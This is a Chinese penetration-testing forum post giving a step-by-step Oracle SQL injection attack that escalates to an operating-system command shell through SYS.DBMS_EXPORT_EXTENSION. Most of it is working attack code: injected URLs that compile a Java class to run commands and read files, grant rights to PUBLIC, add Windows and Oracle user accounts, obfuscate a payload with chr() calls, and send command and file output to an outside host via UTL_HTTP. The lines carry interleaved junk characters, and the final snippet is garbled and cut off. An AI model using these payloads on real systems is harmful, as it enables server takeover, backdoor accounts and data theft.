找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
返回列表 发新帖
查看: 2917|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 & J, x$ N2 ?5 M8 C

7 s" d4 g) z( f2 u. O; W  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
% F3 D' s4 z) U- y7 V# x的形式即可。(用" 'a'|| "是为了让语句返回true值)
/ c' @6 h8 o3 J5 j0 {' J语句有点长,可能要用post提交。 & `, \1 g6 ?, k7 l5 m* Z; G; m2 H
以下是各个步骤:
( k" @% K( Z  Q* v' R1.创建包 7 b) Q+ _, ]( ]- E% L- N. o
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
2 a% V- g% x4 d9 s' q/xxx.jsp?id=1 and '1'<>'a'||(
) C2 E. d3 A: }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''( G- e- h9 N* n& l4 L- u) E, \
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
7 x% [2 I0 n  I) @  `2 H- hnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
9 ?6 e( n( d) Y1 A1 C; f' o; c}'''';END;'';END;--','SYS',0,'1',0) from dual
8 a& W. ]8 V2 V. K)
, Q( T- R' `# g+ o& |) r------------------------
+ ~; k0 B) ?) V2 _如果url有长度限制,可以把readFile()函数块去掉,即:
7 a2 ~1 u& u- u/xxx.jsp?id=1 and '1'<>'a'||(
# p9 B0 X% K6 }  W( Xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 N- b" {3 j  f, d* d& l' C
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
/ D/ k* Z8 }4 Fnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
& \3 N) r- |* v6 T8 l4 q+ L}'''';END;'';END;--','SYS',0,'1',0) from dual
/ ~$ w! V' x' x& a9 o0 Z) & ?. A7 K* y# v1 A: @+ \/ M
同时把后面步骤 提到的 对readFile()的处理语句去掉。
0 m6 ^: `/ e% I7 g------------------------------ 2 |& U# d2 G3 U* r& ]: e) \, W
2.赋Java权限 ; x4 J1 M3 ~% @& j- ^3 k$ O. E! F
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual/ G0 E7 n/ A  y5 U
3.创建函数 % G- F1 ?! h5 d! o" @3 f! i& b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& N% j- |6 V. k* ^create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual7 J; K) V; |  J
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  T# E% E+ U5 Y3 Jcreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
6 n  O7 [/ c8 q9 O: d! B4.赋public执行函数的权限 + h+ ?) Q6 D& [
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
" o3 ^9 |! n- ^0 m( ]select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual* ]2 t# O$ Q8 E# U; n
5.测试上面的几步是否成功 9 f, X7 R! u8 k7 V+ M$ a
and '1'<>'11'||(
+ E' ^) ^3 z" J. M+ U  d( ?select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
! \, u+ T' T4 a)
3 U4 N) T7 h" Y) A  ^' ?and '1'<>(
( R) F8 u4 J3 aselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' - O3 U" ~' s4 S2 i7 w2 l" ~  |
) 6 B; }& s/ r, I6 {
6.执行命令: * a* K3 X  D0 ?3 c
/xxx.jsp?id=1 and '1'<>( # G/ J7 D- c3 G  j
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual " {! q: j$ ?" L; O! R7 e
) D+ D3 J1 v2 L6 [6 F8 e5 F
)
8 o( D( P- @% z1 ?& m/xxx.jsp?id=1 and '1'<>(
) z' c2 f/ a$ [( {( Rselect  sys.LinxReadFile('c:/boot.ini') from dual
, Y: L7 S, P+ C& y" t) a( s
' T1 p3 y0 r/ X% b: K8 F- b)# u0 Z8 Y5 B2 o, ^4 n
  
$ c  S5 w. A7 N注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
! f& D- U' d8 w6 |" O0 U如果要查看运行结果可以用 union :
- T4 V$ R9 z  o4 @9 U/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
) z5 R7 B% u+ ]5 x* {! p% `& T或者UTL_HTTP.request(: + L* O1 n  P! ^6 T
/xxx.jsp?id=1 and '1'<>( 5 |/ h( @$ i0 g) ~1 D
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
6 |7 D+ g$ _# Y. p5 a* F$ h) ; ?' q4 a  e; ~5 w3 F/ w, x5 g  F
/xxx.jsp?id=1 and '1'<>(
, J8 }6 N& d; K& P* nSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual1 \  X$ b: o) n; t2 P4 Z
)
4 Y& B% ~7 Q. W! m注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
& w* E0 ?. E4 H3 P* o-------------------- * W5 i8 E$ E+ t0 i* o8 T
6.内部变化
9 P; X8 ?1 s7 m- w通过以下命令可以查看all_objects表达改变:
. l* ^9 e4 ~$ ~& Qselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
3 ?8 }6 |9 i( Y6 `* z1 `, R# h7.删除我们创建的函数 , z' J0 p- F$ w, z9 y0 Z# x0 T# {; @/ @
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) e  A. ]% U( e' ~* Vdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
! S8 l. m6 j2 S0 f( l====================================================
' Q7 \7 f) v: q( |1 [全文结束。谨以此文赠与我的朋友。
  a, w, G1 @) A3 u  X- |9 u! L4 Mlinx 8 ]# ?( G/ E( o7 K2 O
124829445 $ R+ J! N- [+ c
2008.1.12
" Y9 J# r9 {' ]1 c6 Q: A! olinyujian@bjfu.edu.cn
1 I' j; ]4 }; @- o& `5 e$ K====================================================================== , ?3 O; F5 u* U9 t* F6 I! V
测试漏洞的另一方法: + P: d9 L4 h0 p0 \5 j+ d
创建oracle帐号: ; G% c$ M5 }4 f3 w
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) f# T+ b0 C3 w$ fCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
! k& h$ n: L7 c# n% }; o( B即:   c1 y# R# L, T; g5 F: r6 @
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
& x, q+ @+ t2 m7 J1 _) `% @chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
/ K1 T( z7 k9 U: W7 |确定漏洞存在: " L! X9 y" T/ n
1<>( 3 W/ w0 _6 ]6 A: D3 I5 Q9 z
select user_id from all_users where username='LINXSQL'
9 s# g( u/ m# Y, U$ F)
6 I3 V9 P, i2 D; o8 I给linxsql连接权限:
7 ?: o! E4 U( c/ ~4 Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
6 u9 }4 u+ m( DGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
. A( H* S: Z9 }- y/ w. i2 d3 P% W删除帐号:
2 p- ~% Y& [7 O9 u1 H+ rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
* W9 [# p! K( T4 `drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
: [- J- f7 R2 y; R3 p5 |3 I======================
/ I3 T! F+ g# K4 G- ]7 Y/ p以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:  k0 l+ B. t; }7 Z
1.jsp?id=1 and '1'<>(
, l' V( M' T9 s$ ~' A3 Dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& x% F1 y: J  L2 ^& V. @% o* ^, Hcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
. i+ B" e3 d/ }/ D$ ~. `) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE" K4 s: `  M6 G' D
 )
! U' h/ H* b$ `: ?. g, c# [; `! l
% Z6 k: [6 U$ U6 M# y! P
* ?( c/ R/ o; F6 P1 m4 |
% }8 u2 ^& |! J+ Q& t  A
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表